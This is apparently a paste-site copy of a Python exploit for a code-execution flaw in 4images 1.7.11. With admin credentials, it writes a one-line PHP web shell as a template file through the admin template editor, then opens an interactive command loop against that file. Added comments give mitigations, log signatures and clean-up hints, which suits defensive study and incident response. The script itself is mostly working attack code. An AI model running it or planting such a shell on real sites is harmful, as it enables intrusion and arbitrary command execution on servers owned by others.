3xploit3r

4images 1.7.11 Code Execution

Aug 12th, 2016
#!/usr/local/bin/python
# Exploit for 4images 1.7.11 Code Execution vulnerability
# An admin account is required to use this exploit
# Curesec GmbH
#
# Defender's summary: with valid admin credentials the script saves a
# "template" whose name ends in ".php" through the admin template editor
# and then requests that file from the web root.  The weakness it relies
# on is an authenticated file write, not an authentication bypass.  The
# mitigations are on the application side (restrict what the template
# editor may write: allow-listed names and extensions) and on the server
# side (do not execute PHP from the templates directory).

import sys   # imported but not used in the visible code
import re
import argparse
import requests # requires requests lib

# Command line: base URL of the site plus the admin credentials.
parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()

url = args.url
username = args.username
password = args.password

# Admin endpoints, appended to the base URL: the login form and the
# template editor (the "file manager" that upload() posts to).
loginPath = "/admin/index.php"
fileManagerPath = "/admin/templates.php"

# The file written through the template editor: a one-line PHP web shell
# that hands the "x" query parameter to passthru().  A .php file with this
# name under templates/default/ is the on-disk artefact an incident
# responder should look for.
shellFileName = "404.php"
shellContent = "<?php passthru($_GET['x']); ?>"
  26.  
def login(requestSession, url, username, password):
    # Authenticate `requestSession` against the admin login form at `url`.
    # Returns True when the response no longer contains the form field
    # "loginpassword", which the script treats as a successful login.
    #
    # The form carries a __csrf token; it is read from a GET of the same
    # page with the same session, so the token only stops cross-site
    # requests and gives no protection once valid admin credentials are
    # in an attacker's hands.  Admin logins from unexpected sources are
    # the signal to watch for on the defending side.
    csrfRequest = requestSession.get(url)
    # Greedy match on the hidden __csrf input.  re.search() returns None
    # when the field is absent, and .group(1) then raises AttributeError.
    csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)

    postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": username, "loginpassword": password}
    loginResult = requestSession.post(url, data = postData).text
    # Heuristic: a re-rendered login form means the credentials were rejected.
    return "loginpassword" not in loginResult
  35.  
def upload(requestSession, url, fileName, fileContent):
    # Save `fileContent` as a template named `fileName` in the "default"
    # template folder via the admin template editor at `url`.  Name and
    # content are sent exactly as given; the caller relies on the server
    # writing the file under templates/default/ and serving it from there
    # (see the URL built for runShell() in the main block).  The response
    # is never inspected, so a rejected save goes unnoticed.
    #
    # Application-side mitigation: validate template_file_name against an
    # allow-list of existing template names/extensions.  Server-side:
    # deny PHP execution inside the templates directory.  For detection,
    # a savetemplate request carrying a .php template_file_name is a
    # clear web-log signature.
    csrfRequest = requestSession.get(url)
    # Same __csrf extraction as login(); a None from re.search() raises here.
    csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)

    postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, "template_folder": "default"}
    # Assigned but never read: the result of the save is not checked.
    loginResult = requestSession.post(url, data = postData).text
  43.  
def runShell(url):
    # Interactive loop: read a line from stdin, append it unencoded to
    # `url` (the web shell's "?x=" query) and print the response body.
    # raw_input() is Python 2 only, consistent with the shebang.
    #
    # Note the plain requests.get() here, not the authenticated session:
    # once written, the dropped file is reachable without any login.
    # Each iteration is one GET to the template path with a command in
    # the query string, which is the pattern to hunt for in access logs.
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    # Substring test: any input containing "exit" ends the loop.
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")
  50.  
# Main flow: one session for login and upload, then an anonymous request
# loop against the dropped file.
requestSession = requests.session()

if login(requestSession, url + loginPath, username, password):
    print("successful: login")
else:
    # exit() with a string prints it to stderr and exits with status 1.
    exit("ERROR: Incorrect username or password")

# Write the web shell through the template editor ...
upload(requestSession, url + fileManagerPath, shellFileName, shellContent)

# ... and talk to it at the path where the saved template is expected to
# be served.  Nothing removes the file afterwards; it remains on disk
# after this script ends, so clean-up is part of incident response.
runShell(url + "/templates/default/" + shellFileName + "?x=")